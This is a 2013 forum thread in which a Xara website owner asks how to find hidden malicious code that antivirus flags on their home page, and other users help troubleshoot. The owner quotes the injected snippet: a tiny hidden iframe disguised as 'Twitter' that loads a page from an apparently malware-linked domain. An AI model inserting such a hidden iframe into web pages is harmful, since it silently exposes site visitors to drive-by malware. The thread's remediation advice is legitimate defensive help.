Locating hidden exploit code within a home page design

**The Balt** · 04 June 2013, 10:51 PM

I appear to have an rogue piece of code that has somehow inserted itself into my current website design and I am unable to find where it would be hiding. Whenever I view the page in a browser my security software comes up with this warning

Exploit:HTML/IframeRef.DM

The AV software cleans it from the cache but as soon as I reload the page of course it is back again

I have tried to back track as to where it would have first appeared and all I can think of is when I tried to include a FormSite form into a placeholder on my home page - but this is a wild guess. I have deleted the placeholder for this and as far as I know the associated <iframe> placeholder also.

The images I am using on the site are a combination of in house photos and some that I have purchased from 123RF which I would expect would be free of malicious code.

I also played with the Facebook wideget to but have since deleted it as well.

So far I have trawled the page for possible locations but no luck.

Looking at the source code of the page I find at the very bottom of all the code..


<script type="text/javascript">xr_aeh()</script>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?i=1353323></iframe></body>
</html>

Where is this hiding?

Anyone have any experience with how I would go about finding what this code has attached itself to?

Cheers

**Jimi King** · 04 June 2013, 11:44 PM

It would appear to be something to do with the Twitter iframe. The URL in that triggers my anti virus.

**jim64** · 05 June 2013, 12:35 AM

does it happen on your computer When you visit any other web pages? Is the AV that comes up Your anti virus or a FAKE AV , There are some of those around associated with Twitter and Facebook.

**The Balt** · 05 June 2013, 12:50 AM

I only played with inserting a Facebook widget into the home page as well as embeding a feedback form that I have stored on FormSite. I was able to get the Facebook widget to work, however with the embeded form I first received the AV notice when I tried to use it live on my site.

My AV is Microsoft Security Essentials and Malware Bytes.

I don't know where that iframe is hiding though - I have even painstakingly deleted all the body content on the home page and the dragged the mouse over the resulting blank page. It took a few passes but I found 2 small hidden frames which I deleted and then put the page back together again.

I uploaded the home page again and it all seemed to work fine till this morning when it would not only bring up the AV warning but also no graphics on the page would load.

I don't get any warning when I browse the internet - only if I attempt to reload my own webpage.

The source code mentions png.js - I assume that is the culprit and the Twitter iframe is is inside that. Is there a way in Xara to display all iframes or scripts that are a part of a page?

Thanks for the help.

**steve.ledger** · 05 June 2013, 01:02 AM

It is more likely that the code injection is occurring on the server after you have published.
To test this, publish a new totally empty page.

The xara png.js is for older versions of IE to show alpha channel png images, nothing to do with twitter or iframes.

**The Balt** · 05 June 2013, 09:04 AM

I have deleted the index_htm file folder, then uploaded a blank page - no AV notice. I then uploaded a single Xara template page that didn't upset the AV software either. Now I have uploaded the original .web file and will wait to see what happens.

I had tried deleting all the files and folders on the web server previously and the exploit didn't appear immediately - worked ok that night but next morning site was broken.

Cheers

**xtom** · 05 June 2013, 09:24 AM

Did you remove this as suggested?

As it's at the bottom of your page code the first place I would check is in Web Properties -> Website tab -> Html Code (body). And also check any placeholders.

If you can't find the code when editing in xara try exporting the website locally and when you view the exported source is the offending code there? And does it match exactly with the source of the online page? If not you might have some malicious script on your website that's modifying the uploaded files and you shoud change your ftp password and search for any dodgy files and remove them and then upload your site again.

**Jimi King** · 05 June 2013, 12:38 PM

Originally Posted by jim64

does it happen on your computer When you visit any other web pages? Is the AV that comes up Your anti virus or a FAKE AV , There are some of those around associated with Twitter and Facebook.

Yes it does happen occasionally. The AV warning is from my Bitdefender anti phishing toolbar.

It certainly looks like you have something resident on your server that is generating the malicious code. If you Google around, kozijnen.com does seem to be associated with malware.

**ckh** · 05 June 2013, 03:11 PM

It's also possible that your ftp login has been compromised. You may want to change it or if you have access, review your ftp log to see who's been logging in, it should note the IPs of people uploading/downloading files. If you see a strange IP there, change your password.

**Craray** · 07 June 2013, 04:59 PM

Are you by any chance using filezilla to upload your sites?
I was once told that it stores passwords without encryption and that hackers can get the passwords very easy when using torrents and such...